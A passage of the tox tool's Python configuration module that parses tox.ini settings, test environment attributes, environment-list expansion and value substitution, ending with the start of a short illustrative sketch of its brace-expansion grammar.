help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
def skip_install_default(testenv_config, value):
return value is True or testenv_config.config.option.skip_pkg_install is True
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
postprocess=skip_install_default,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals", type="line-list", help="DEPRECATED: use allowlist_externals",
)
parser.add_testenv_attribute(
name="allowlist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Before 2.8.1, missing substitutions crashed with a ConfigError even though this is not a
problem if the env is not part of the current test run. So we remember them here and
only raise later, when the testenv is actually run.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class SkipThisIni(Exception):
"""Internal exception to indicate the parsed ini file should be skipped"""
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath() if ini_path.check(file=True) else ini_path
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
if ini_path.basename == "setup.cfg" and "tox:tox" not in self._cfg:
verbosity1("Found no [tox:tox] section in setup.cfg, skipping.")
raise SkipThisIni()
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
reader.addsubstitutions(distshare=config.distshare)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(temp_dir=config.temp_dir)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, we now need to do a strict argument
# evaluation and raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,-]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = _ENVSTR_SPLIT_PATTERN.split(envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = _ENVSTR_EXPAND_PATTERN.split(env)
parts = [_WHITESPACE_PATTERN.sub("", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
            # Factors have to be applied before the dependencies are unwrapped,
            # otherwise unwrapping can break the substitution process. Once the
            # values are unwrapped, factors are applied again for the newly
            # introduced dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = _FACTOR_LINE_PATTERN.search(line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided",
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
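The brace grammar handled by _expand_envstr and expand_section_names above is easier to see with a concrete input. The sketch below is not tox code: it re-implements the comma/brace expansion with its own regex and helper names, purely to illustrate what an envlist entry such as py{37,38}-{lin,win} turns into.

# factor_expansion_demo.py -- illustrative sketch only, not part of tox
import itertools
import re

_GROUP = re.compile(r"\{([^}]*)\}")

def expand(envstr):
    # split the string into literal chunks and {...} groups, then take the
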